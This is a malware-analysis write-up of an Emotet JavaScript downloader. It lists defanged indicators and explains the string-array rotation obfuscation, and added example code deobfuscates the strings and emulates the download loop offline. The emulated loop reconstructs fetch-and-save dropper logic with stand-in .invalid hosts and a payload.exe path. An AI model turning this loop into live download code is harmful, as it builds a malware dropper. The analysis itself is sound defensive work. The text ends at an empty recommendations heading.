Emotet is an advanced, modular downloader that primarily functions as a dropper of other opportunistic malware variants. Emotet continues to be among the most widely distributed and destructive malware variants affecting organizations throughout the private and public sectors. In a previous joint Technical Alert, US-CERT identified that Emotet infections have cost organizations up to $1 million per incident to remediate.
Many crimeware variants are effectively mitigated by technical email controls. Emotet campaigns, however, consistently evade those controls and reach end users, so defenders must rely on secondary controls to block these attacks. This variant is tracked closely by researchers and defenders because of its destructive and evasive capabilities. Multiple messages delivered on March 25th and during the following week demonstrated a tactical evolution.
While the pretexts of Emotet phishing emails remain primarily payment- or invoice-themed, several message templates have been updated to include a digital-signature attachment, which is designed to increase the sense of legitimacy.
If the download succeeds, the victim system is infected with Emotet and may be leveraged for any of its information-stealing or spamming capabilities, in addition to the loading of secondary payloads.
The script is structured into five primary functions and uses an array of clear-text strings to construct its commands. Beyond the array, the primary obfuscation technique is simple variable and function renaming: every identifier is replaced with a random hexadecimal string. The actors likely used some form of automated obfuscation; brief testing with a publicly available JavaScript obfuscation tool produced the same naming convention seen in the malware sample. All of the replaced hexadecimal names are prefixed with an underscore ("_"). Archives from later campaigns also carried this character in their filenames (e.g. 2019_03_US_ACC5829121550658987___1442635324.zip). The file examined here is the one that would have been downloaded on March 25:
- URL: hxxp://certs365[.]co[.]uk/cgi-bin/0597655/MhGd-XDEdG_ikZAZg-6s/
- SHA-256 (archive): 1836015128231d2aed428b7da5220f23b49cc25bde5f0b60add0e31730c2b58c
- File Name: US238979231912290.zip
- SHA-256 (script): FA24322FB07A7DF35F0BE3C5F4E72F0B9456CE73F2049EC9FFC0B97DCE5A4FBE
- File Name: US238979231912290.js
The unmodified script is quite a mess, but we can use a beautifier tool that will help make sense of what is going on here. One thing that immediately stands out is the clear text strings, which will make the de-obfuscation a much easier process overall. For additional details, see an analysis of a similar script that was conducted by Cofense researchers who cleaned up several more portions of a script with comments and functional replacements of the object identifiers.
The script begins with a variable initialised to an array of strings. The remaining functions index into this array to assemble the commands and URLs used to fetch the stage 2 payload; the text of the decoy pop-up noted earlier is stored here as well. The array is not stored in the order the lookups expect: a short routine "shuffles" it by repeatedly calling "push" (append an item to the end of the array) with the result of "shift" (remove the first item), while the "--" and "++" operators drive the loop counter. The counter is seeded with the hex literal 0x1a6 (decimal 422), so the push/shift step runs 422 times. Because each push(shift()) rotates the array left by one position, the net effect is a fixed rotation by 422 modulo the array length rather than a random shuffle, and applying the same rotation to the stored array yields the order that the index-based lookups refer to.
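The following is an added example written for this write-up, not code taken from the Emotet sample or from any obfuscation tool. It reproduces the push/shift "shuffle" that common JavaScript obfuscators emit, shows that it is a plain rotation, and then resolves the hex-indexed string lookups statically so a beautified script can be read in clear text. The array contents, the accessor name `_0x3b2c` and the fragment being resolved are constructed for illustration; the exact loop form (`while (--n) arr.push(arr.shift())` seeded with `++literal`) is an assumption about the obfuscator's output, with the literal 0x1a6 taken from the analysis above.

```javascript
// Added example (editor's code, not the Emotet sample): reproduce the
// push/shift "shuffle", show it is a rotation, and resolve index lookups.
// Array contents, accessor name and the fragment below are constructed.

// Constructed stand-in for the obfuscated string array.
const OBFUSCATED_ARRAY = [
  "Scripting.FileSystemObject",
  "WScript.Shell",
  "ADODB.Stream",
  "MSXML2.XMLHTTP",
  "GET",
  "open",
  "send",
  "Status",
  "ResponseBody",
  "hxxp://example.invalid/payload/",
];

// The shuffle in the (assumed) form the obfuscator emits: push(shift())
// rotates the array left by one; seeding with ++literal and looping while
// (--n) runs the body exactly `literal` times.
function obfuscatorShuffle(arr, literal) {
  const out = arr.slice();
  let n = literal + 1;          // the ++ at the call site
  while (--n) {                 // the -- in the loop header
    out.push(out.shift());
  }
  return out;
}

// Closed form: only (count mod length) matters, so "shuffle 422 times" is a
// fixed rotation by 422 % arr.length, not a random permutation.
function rotateLeft(arr, count) {
  const n = arr.length;
  const k = ((count % n) + n) % n;
  return arr.slice(k).concat(arr.slice(0, k));
}

// Accessor in the shape the script uses: _0x3b2c(0x2) -> rotated[2].
function makeAccessor(rotated) {
  return function (idx) {
    return rotated[Number(idx)];
  };
}

// Static pass: replace every accessorName(<hex or decimal index>) in
// `source` with the string literal it resolves to. Unknown indices are left
// untouched so the output stays valid script.
function resolveAccessorCalls(source, accessorName, rotated) {
  const escaped = accessorName.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  const re = new RegExp(escaped + "\\((0x[0-9a-fA-F]+|\\d+)\\)", "g");
  return source.replace(re, function (match, idx) {
    const value = rotated[Number(idx)];
    return value === undefined ? match : JSON.stringify(value);
  });
}

// Constructed obfuscated fragment to run the pass over.
const SAMPLE_FRAGMENT =
  "var _0x5d = new ActiveXObject(_0x3b2c(0x0));" +
  "var _0x6e = new ActiveXObject(_0x3b2c(0x1));" +
  "_0x6e[_0x3b2c(0x3)](_0x3b2c(0x2), _0x3b2c(0x7), false);";

// Rotate by the literal 0x1a6 (422), then resolve the fragment.
function demo() {
  const rotated = obfuscatorShuffle(OBFUSCATED_ARRAY, 0x1a6);
  return resolveAccessorCalls(SAMPLE_FRAGMENT, "_0x3b2c", rotated);
}

if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  console.log(demo());
}
```

With a ten-element array, 422 rotations collapse to a rotation by two, so `_0x3b2c(0x0)` resolves to "ADODB.Stream" and `_0x3b2c(0x7)` to the URL. In a real sample the same pass is run over the beautified script after the accessor name and the rotation literal have been read off the top of the file.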
The next section of the script starts the primary functions. The first two are responsible for initiating the download of the payload and for looping through the five hardcoded URLs. Once again the strings come from the array: the obfuscated variable and function names are meaningless hexadecimal identifiers, and each lookup passes a hex-encoded index into the shuffled array. The functions check the HTTP response and use an ADODB.Stream object to write the payload pulled from whichever looped URL answers. Four of the URLs are stored in the plaintext array and one is embedded in the function itself.
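The following is an added example written for this write-up, not code from the Emotet sample: a minimal offline emulation harness in the style of sandbox tools such as box-js. It stubs the two COM objects the download loop needs, MSXML2.XMLHTTP and ADODB.Stream, logs every network and file action instead of performing it, and drives a constructed downloader that follows the logic described above (walk the hardcoded URL list, check the response, write the body through ADODB.Stream). The URL list, the canned responses, the save path and the "status 200 plus MZ header" acceptance check are assumptions made for the example, not details recovered from the sample.

```javascript
// Added example (editor's code, not the Emotet sample): emulate the URL
// loop offline by stubbing ActiveXObject. URLs, responses, save path and the
// acceptance check are constructed assumptions.

// Constructed URL list (five entries, like the sample's loop). The .invalid
// TLD is reserved and never resolves.
const CONSTRUCTED_URLS = [
  "http://one.invalid/cgi-bin/a/",
  "http://two.invalid/cgi-bin/b/",
  "http://three.invalid/cgi-bin/c/",
  "http://four.invalid/cgi-bin/d/",
  "http://five.invalid/cgi-bin/e/",
];

// Canned responses so the run is deterministic: a dead host, a "200 OK" that
// is really an HTML error page, then a live payload. Other URLs get 404.
const CANNED_RESPONSES = {
  "http://one.invalid/cgi-bin/a/": { status: 0, body: "" },
  "http://two.invalid/cgi-bin/b/": { status: 200, body: "<html>not here</html>" },
  "http://three.invalid/cgi-bin/c/": { status: 200, body: "MZ\u0090\u0000\u0003" },
};

// Build a fake ActiveXObject constructor that records what the script does.
function makeEmulatedEnvironment() {
  const log = [];

  function XMLHTTP() {
    this.Status = 0;
    this.ResponseBody = "";
    this.open = function (method, url, async) {
      this._url = url;
      log.push("XMLHTTP.open " + method + " " + url + " async=" + async);
    };
    this.send = function () {
      const r = CANNED_RESPONSES[this._url] || { status: 404, body: "" };
      this.Status = r.status;
      this.ResponseBody = r.body;
      log.push("XMLHTTP.send -> " + r.status + " (" + r.body.length + " bytes)");
    };
  }

  function Stream() {
    this.Type = 0;
    this.Position = 0;
    this.Open = function () { log.push("Stream.Open"); };
    this.Write = function (data) { log.push("Stream.Write " + data.length + " bytes"); };
    this.SaveToFile = function (path, mode) { log.push("Stream.SaveToFile " + path + " mode=" + mode); };
    this.Close = function () { log.push("Stream.Close"); };
  }

  function ActiveXObject(progid) {
    log.push("new ActiveXObject(" + progid + ")");
    const name = progid.toLowerCase();
    if (name === "msxml2.xmlhttp") return new XMLHTTP();
    if (name === "adodb.stream") return new Stream();
    throw new Error("unexpected ProgID: " + progid);
  }

  return { ActiveXObject: ActiveXObject, log: log };
}

// Constructed downloader: try each URL in order and stop at the first body
// that passes the (assumed) check of HTTP 200 plus an "MZ" header.
function runDownloadLoop(urls, ActiveXObject, savePath) {
  const tried = [];
  for (let i = 0; i < urls.length; i++) {
    const http = new ActiveXObject("MSXML2.XMLHTTP");
    http.open("GET", urls[i], false);
    http.send();
    tried.push(urls[i]);
    const body = http.ResponseBody;
    if (http.Status === 200 && body.length > 0 && body.substring(0, 2) === "MZ") {
      const stream = new ActiveXObject("ADODB.Stream");
      stream.Open();
      stream.Type = 1;                  // adTypeBinary
      stream.Write(body);
      stream.Position = 0;
      stream.SaveToFile(savePath, 2);   // adSaveCreateOverWrite
      stream.Close();
      return { success: true, source: urls[i], tried: tried };
    }
  }
  return { success: false, source: null, tried: tried };
}

// Run the loop against the stubs and return both the outcome and the log.
function demoDownloadLoop() {
  const env = makeEmulatedEnvironment();
  const result = runDownloadLoop(CONSTRUCTED_URLS, env.ActiveXObject, "C:\\Users\\Public\\payload.exe");
  return { result: result, log: env.log };
}

if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  console.log(demoDownloadLoop().log.join("\n"));
}
```

The log is the analyst's output: every URL the loop attempted, in order, and the path the payload would have been written to, without any real network or file activity. Pointing the same harness at the de-obfuscated sample in place of the constructed loop is how the full URL list and the drop location are recovered when one of the hosts is already down.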
The final primary function is the one responsible for kicking off the script’s operations.
Conclusion — Recommendations